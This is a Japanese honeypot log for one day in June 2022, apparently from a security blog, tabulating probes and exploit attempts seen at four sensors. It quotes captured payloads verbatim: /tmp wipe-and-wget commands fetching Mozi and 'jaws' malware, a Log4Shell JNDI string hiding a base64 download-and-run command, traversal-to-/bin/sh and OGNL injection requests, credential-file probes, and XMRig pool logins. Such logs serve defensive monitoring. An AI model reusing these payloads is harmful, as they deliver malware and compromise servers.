ハニーポット(仮) 観測記録 2022/06/15分です。
特徴
共通
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Laravelへのスキャン行為
Location:JP
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Lkx-TraversalHttpPluginによるスキャン行為
l9exploreによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
Apache Solrへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget cnc.krakenbit.net/jaws; sh /tmp/jaws
Location:US
D-link製品の脆弱性を狙うアクセス
WordPressへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://112.27.83.23:40098/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:UK
curlによるスキャン行為
.cssへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
を確認しました。
Location:SG
aiohttpによるスキャン行為
Apache Solrへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://58.253.13.235:51279/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
他
アクセス数推移
JP:総アクセス数:111 (前日比:-100)
US:総アクセス数:65 (前日比:-122)
UK:総アクセス数:164 (前日比:125)
SG:総アクセス数:92 (前日比:-118)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 2.58.149.222 | Netherlands |
2 | 5.252.194.39 | Russia |
18 | 20.78.0.40 | United States |
1 | 27.202.142.236 | China |
9 | 35.198.205.123 | United States |
1 | 45.142.122.136 | Seychelles |
6 | 52.188.13.157 | United States |
1 | 62.233.50.179 | Russia |
16 | 95.214.235.205 | Ukraine |
1 | 96.44.162.70 | United States |
1 | 107.130.226.91 | United States |
2 | 109.237.103.118 | Russia |
1 | 115.220.142.42 | China |
7 | 135.125.244.48 | France |
6 | 135.125.246.110 | France |
1 | 136.144.41.171 | Netherlands |
7 | 149.56.234.155 | Canada |
2 | 157.245.70.127 | United States |
1 | 159.203.77.179 | United States |
6 | 161.35.86.181 | United States |
1 | 165.227.122.29 | United States |
4 | 178.128.111.232 | United States |
1 | 180.211.137.57 | Bangladesh |
1 | 183.136.225.35 | China |
2 | 185.196.220.81 | Netherlands |
11 | 193.106.191.95 | Russia |
1 | 198.235.24.8 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
9 | - |
3 | Go-http-client/1.1 |
2 | Hello, World |
1 | Lkx-TraversalHttpPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis) |
18 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
37 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
9 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
1 | l9explore/1.3.0 |
2 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//191[.]243[.]196[.]26:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzIwMC4xNTAuMTk4LjkyLzhVc0Euc2g7IGN1cmwgLU8gaHR0cDovLzIwMC4xNTAuMTk4LjkyLzhVc0Euc2g7IGNobW9kIDc3NyA4VXNBLnNoOyBzaCA4VXNBLnNo}') |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
3 | \x16\x03\x01 |
||
1 | CONNECT | leakix[.]net:443 |
HTTP/1.1 |
1 | GET | /.DS_Store |
HTTP/1.1 |
3 | GET | /.aws/credentials |
HTTP/1.1 |
2 | GET | /.env.bak |
HTTP/1.1 |
33 | GET | /.env |
HTTP/1.1 |
1 | GET | /2018/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /2019/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
2 | GET | /:80:undefined?id= |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
2 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /aws.yml |
HTTP/1.1 |
1 | GET | /blog/ |
HTTP/1.1 |
1 | GET | /blog/robots.txt |
HTTP/1.1 |
1 | GET | /blog/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts |
HTTP/1.1 |
1 | GET | /cms/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /config.js |
HTTP/1.1 |
2 | GET | /config/aws.yml |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
3 | GET | /info.php |
HTTP/1.1 |
1 | GET | /media/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /news/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
2 | GET | /phpinfo.php |
HTTP/1.1 |
2 | GET | /phpinfo |
HTTP/1.1 |
1 | GET | /public/.env |
HTTP/1.1 |
2 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ cnc.krakenbit.net/jaws;sh+/tmp/jaws |
|
1 | GET | /shop/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /site/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /sito/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /storage/.env |
HTTP/1.1 |
1 | GET | /test/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /vendor/.env |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /web/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /website/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /wordpress/ |
HTTP/1.1 |
1 | GET | /wordpress/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /wp/ |
HTTP/1.1 |
1 | GET | /wp/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /wp1/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /wp2/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
2 | GET | /xmlrpc.php?rsd |
HTTP/1.1 |
1 | HEAD | /robots.txt |
HTTP/1.0 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
2 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
4 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PUT | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
3 | 2.57.122.80 | Romania |
1 | 2.58.149.222 | Netherlands |
1 | 20.74.80.211 | United States |
1 | 45.142.122.136 | Seychelles |
1 | 49.143.32.6 | South Korea |
9 | 51.79.29.48 | Canada |
2 | 52.165.81.170 | United States |
6 | 52.188.13.157 | United States |
1 | 62.233.50.179 | Russia |
1 | 96.44.162.70 | United States |
2 | 107.173.177.147 | United States |
1 | 112.27.83.23 | China |
1 | 112.65.54.206 | China |
1 | 115.56.188.146 | China |
1 | 137.184.226.45 | United States |
4 | 147.78.47.53 | Lebanon |
2 | 157.245.70.127 | United States |
1 | 162.142.125.121 | United States |
1 | 162.142.125.212 | United States |
1 | 164.92.252.11 | United States |
1 | 167.172.247.109 | United States |
2 | 185.196.220.81 | Netherlands |
9 | 185.254.196.223 | Ukraine |
2 | 193.56.29.120 | United Kingdom |
8 | 193.106.191.95 | Russia |
1 | 198.235.24.142 | United States |
1 | 205.210.31.145 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
15 | - |
1 | Hello, World |
1 | Hello, world |
3 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0 |
25 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
5 | \x03 |
||
1 | \x16\x03\x01\x02 |
||
2 | \x16\x03\x01 |
||
27 | GET | /.env |
HTTP/1.1 |
1 | GET | /.sendgrid |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /blog/ |
HTTP/1.1 |
1 | GET | /blog/robots.txt |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /sendgrid.env |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//112[.]27[.]83[.]23:40098/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /wordpress/ |
HTTP/1.1 |
1 | GET | /wp/ |
HTTP/1.1 |
1 | GET | /xmlrpc.php?rsd |
HTTP/1.1 |
1 | HEAD | /robots.txt |
HTTP/1.0 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
4 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 2.58.149.222 | Netherlands |
1 | 3.236.144.14 | United States |
1 | 4.17.224.131 | United States |
1 | 5.181.86.250 | Ukraine |
1 | 20.74.80.211 | United States |
1 | 31.220.1.83 | Germany |
1 | 45.146.165.168 | Russia |
1 | 51.142.148.13 | United Kingdom |
1 | 104.217.249.182 | United States |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.118 | Russia |
2 | 147.78.47.53 | Lebanon |
2 | 157.230.216.203 | United States |
1 | 167.94.138.63 | United States |
1 | 172.104.138.223 | United States |
128 | 178.79.148.229 | United States |
2 | 185.196.220.81 | Netherlands |
2 | 192.64.84.94 | United States |
1 | 192.241.212.143 | United States |
10 | 193.106.191.95 | Russia |
1 | 198.235.24.9 | United States |
1 | 198.235.24.34 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
14 | - |
1 | Java/1.8.0_333 |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/509.36 (KHTML, like Gecko) Safari/509.36 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0 |
3 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
126 | curl/7.54.0 |
1 | python-requests/2.22.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
1 | MGLNDD_132.145.66.34_80\n |
||
1 | SSH-2.0-libssh2_1.9.0 |
||
2 | \x03 |
||
2 | \x16\x03\x01\x01D\x01 |
||
1 | \x16\x03\x01\x02 |
||
2 | \x16\x03\x01 |
||
1 | CONNECT | api[.]tvup[.]cloud:443 |
HTTP/1.1 |
1 | GET | ../../proc/ HTTP |
|
1 | GET | /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/ |
HTTP/1.1 |
1 | GET | /.aws/credentials |
HTTP/1.1 |
4 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/HEAD |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 |
HTTP/1.1 |
1 | GET | /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /CSS/Miniweb.css |
HTTP/1.1 |
1 | GET | /CeiK |
HTTP/1.1 |
1 | GET | /HNAP1 |
HTTP/1.1 |
1 | GET | /Portal/Portal.mwsl |
HTTP/1.1 |
1 | GET | /Portal0000.htm |
HTTP/1.1 |
1 | GET | /__Additional |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /admin.asp |
HTTP/1.1 |
1 | GET | /admin.aspx |
HTTP/1.1 |
1 | GET | /admin.cfm |
HTTP/1.1 |
1 | GET | /admin.cgi |
HTTP/1.1 |
1 | GET | /admin.html |
HTTP/1.1 |
1 | GET | /admin.jhtml |
HTTP/1.1 |
1 | GET | /admin.jsa |
HTTP/1.1 |
1 | GET | /admin.jsp |
HTTP/1.1 |
1 | GET | /admin.php |
HTTP/1.1 |
1 | GET | /admin.pl |
HTTP/1.1 |
1 | GET | /admin.shtml |
HTTP/1.1 |
1 | GET | /base.asp |
HTTP/1.1 |
1 | GET | /base.aspx |
HTTP/1.1 |
1 | GET | /base.cgi |
HTTP/1.1 |
1 | GET | /base.html |
HTTP/1.1 |
1 | GET | /base.inc |
HTTP/1.1 |
1 | GET | /base.jhtml |
HTTP/1.1 |
1 | GET | /base.jsa |
HTTP/1.1 |
1 | GET | /base.jsp |
HTTP/1.1 |
1 | GET | /base.php |
HTTP/1.1 |
1 | GET | /base.pl |
HTTP/1.1 |
1 | GET | /base.shtml |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /default.asp |
HTTP/1.1 |
1 | GET | /default.aspx |
HTTP/1.1 |
1 | GET | /default.cfm |
HTTP/1.1 |
1 | GET | /default.cgi |
HTTP/1.1 |
1 | GET | /default.html |
HTTP/1.1 |
1 | GET | /default.jhtml |
HTTP/1.1 |
1 | GET | /default.jsa |
HTTP/1.1 |
1 | GET | /default.jsp |
HTTP/1.1 |
1 | GET | /default.php |
HTTP/1.1 |
1 | GET | /default.pl |
HTTP/1.1 |
1 | GET | /default.shtml |
HTTP/1.1 |
1 | GET | /docs/cplugError.html/ |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /fuN3 |
HTTP/1.0 |
1 | GET | /home.asp |
HTTP/1.1 |
1 | GET | /home.aspx |
HTTP/1.1 |
1 | GET | /home.cfm |
HTTP/1.1 |
1 | GET | /home.jhtml |
HTTP/1.1 |
1 | GET | /home.jsa |
HTTP/1.1 |
1 | GET | /home.jsp |
HTTP/1.1 |
1 | GET | /home.php |
HTTP/1.1 |
1 | GET | /home.shtml |
HTTP/1.1 |
1 | GET | /index.asp |
HTTP/1.1 |
1 | GET | /index.aspx |
HTTP/1.1 |
1 | GET | /index.cgi |
HTTP/1.1 |
1 | GET | /index.html |
HTTP/1.1 |
1 | GET | /index.jhtml |
HTTP/1.1 |
1 | GET | /index.jsa |
HTTP/1.1 |
1 | GET | /index.jsp |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /index.php |
HTTP/1.1 |
1 | GET | /index.pl |
HTTP/1.1 |
1 | GET | /index.shtml |
HTTP/1.1 |
1 | GET | /indice.asp |
HTTP/1.1 |
1 | GET | /indice.aspx |
HTTP/1.1 |
1 | GET | /indice.cfm |
HTTP/1.1 |
1 | GET | /indice.cgi |
HTTP/1.1 |
1 | GET | /indice.jhtml |
HTTP/1.1 |
1 | GET | /indice.jsa |
HTTP/1.1 |
1 | GET | /indice.pl |
HTTP/1.1 |
1 | GET | /indice.shtml |
HTTP/1.1 |
1 | GET | /inicio.asp |
HTTP/1.1 |
1 | GET | /inicio.aspx |
HTTP/1.1 |
1 | GET | /inicio.cfm |
HTTP/1.1 |
1 | GET | /inicio.cgi |
HTTP/1.1 |
1 | GET | /inicio.html |
HTTP/1.1 |
1 | GET | /inicio.jsa |
HTTP/1.1 |
1 | GET | /inicio.jsp |
HTTP/1.1 |
1 | GET | /inicio.php |
HTTP/1.1 |
1 | GET | /inicio.pl |
HTTP/1.1 |
1 | GET | /inicio.shtml |
HTTP/1.1 |
1 | GET | /localstart.asp |
HTTP/1.1 |
1 | GET | /localstart.aspx |
HTTP/1.1 |
1 | GET | /localstart.cfm |
HTTP/1.1 |
1 | GET | /localstart.jhtml |
HTTP/1.1 |
1 | GET | /localstart.jsa |
HTTP/1.1 |
1 | GET | /localstart.jsp |
HTTP/1.1 |
1 | GET | /localstart.php |
HTTP/1.1 |
1 | GET | /localstart.pl |
HTTP/1.1 |
1 | GET | /localstart.shtml |
HTTP/1.1 |
1 | GET | /main.asp |
HTTP/1.1 |
1 | GET | /main.aspx |
HTTP/1.1 |
1 | GET | /main.cfm |
HTTP/1.1 |
1 | GET | /main.cgi |
HTTP/1.1 |
1 | GET | /main.html |
HTTP/1.1 |
1 | GET | /main.jhtml |
HTTP/1.1 |
1 | GET | /main.jsa |
HTTP/1.1 |
1 | GET | /main.jsp |
HTTP/1.1 |
1 | GET | /main.php |
HTTP/1.1 |
1 | GET | /main.pl |
HTTP/1.1 |
1 | GET | /main.shtml |
HTTP/1.1 |
1 | GET | /menu.aspx |
HTTP/1.1 |
1 | GET | /menu.cfm |
HTTP/1.1 |
1 | GET | /menu.cgi |
HTTP/1.1 |
1 | GET | /menu.html |
HTTP/1.1 |
1 | GET | /menu.jhtml |
HTTP/1.1 |
1 | GET | /menu.jsp |
HTTP/1.1 |
1 | GET | /menu.php |
HTTP/1.1 |
1 | GET | /menu.shtml |
HTTP/1.1 |
1 | GET | /nmaplowercheck1655217232 |
HTTP/1.1 |
1 | GET | /pools/default/buckets |
HTTP/1.1 |
1 | GET | /pools |
HTTP/1.1 |
1 | GET | /readme.txt |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /server-status |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /start.asp |
HTTP/1.1 |
1 | GET | /start.aspx |
HTTP/1.1 |
1 | GET | /start.cfm |
HTTP/1.1 |
1 | GET | /start.cgi |
HTTP/1.1 |
1 | GET | /start.jhtml |
HTTP/1.1 |
1 | GET | /start.jsp |
HTTP/1.1 |
1 | GET | /start.php |
HTTP/1.1 |
1 | GET | /start.pl |
HTTP/1.1 |
1 | GET | /start.shtml |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /wp-content/ |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
4 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /scripts/WPnBr.dll |
HTTP/1.1 |
1 | POST | /sdk |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 2.58.149.222 | Netherlands |
1 | 13.89.57.215 | United States |
1 | 20.55.53.144 | United States |
1 | 31.220.1.83 | Germany |
3 | 50.116.16.97 | United States |
11 | 51.79.29.48 | Canada |
6 | 52.188.13.157 | United States |
1 | 52.231.199.112 | United States |
1 | 58.253.13.235 | China |
1 | 62.233.50.179 | Russia |
1 | 65.157.23.94 | United States |
4 | 71.6.199.23 | United States |
1 | 96.44.162.70 | United States |
1 | 104.217.249.182 | United States |
2 | 109.237.103.9 | Russia |
1 | 121.46.142.244 | China |
1 | 123.14.187.232 | China |
1 | 143.198.98.147 | United States |
2 | 157.230.216.203 | United States |
1 | 162.142.125.7 | United States |
1 | 162.142.125.213 | United States |
1 | 162.142.125.220 | United States |
1 | 167.94.146.60 | United States |
2 | 185.196.220.81 | Netherlands |
12 | 185.213.175.159 | Spain |
12 | 185.217.0.13 | Isle of Man |
8 | 185.254.196.223 | Ukraine |
1 | 188.165.87.96 | France |
1 | 192.241.221.241 | United States |
11 | 193.106.191.95 | Russia |
UserAgent一覧
件数 | UserAgent |
---|---|
25 | - |
1 | Hello, world |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0 |
2 | Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko |
22 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333) |
1 | Python/3.7 aiohttp/3.7.4.post0 |
3 | \"Mozilla/5.0 |
1 | python-requests/2.17.3 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_13.67.44.234_80 |
||
1 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
2 | \x16\x03\x01\x02 |
||
1 | {\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"45mqPQST3L63Na77pN3TBGJT5t2kDmfUYRDpEsEWZxfXTBFyDrwQnVAVfCP3NDyPgcdHSxpCtAnFRekGEg7AXejn7mvPbWd\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3 |
(Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}} | |
1 | {\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"4856H2VHAPK5HuceVkBAsPQEEXT3Y59bAMCftNLwpHWhFgmb6Yi4fqXSKCzHfPs4e6N6KrRSCLQxEDaZy1dvdrJT99aMQFs\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3 |
(Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}} | |
